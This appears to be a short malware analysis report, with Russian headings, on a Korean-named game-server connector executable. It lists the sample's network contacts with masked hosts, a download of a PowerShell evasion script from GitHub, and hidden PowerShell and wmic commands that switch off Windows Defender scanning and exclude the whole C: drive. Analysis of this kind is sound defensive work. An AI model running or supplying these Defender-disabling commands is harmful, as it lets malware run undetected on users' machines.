Техническая информация
- https://github.com/idov31/mrkaplan/releases/download/v1.1.1/mrkaplan_standalone.ps1
- <Текущая директория>\_가이아서버 접속기.exe
- nul
- 'ap#.##gflare.app':443
- 'gi##ub.com':443
- 'ap#.##gflare.app':443
- 'gi##ub.com':443
- DNS ASK ap#.##gflare.app
- DNS ASK gi##ub.com
- '<Текущая директория>\_가이아서버 접속기.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -NonInteractive " Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -Exclu...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -
- '<SYSTEM32>\cmd.exe' /c "_가이아서버 접속기.exe"
- '<SYSTEM32>\wbem\wmic.exe' /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\*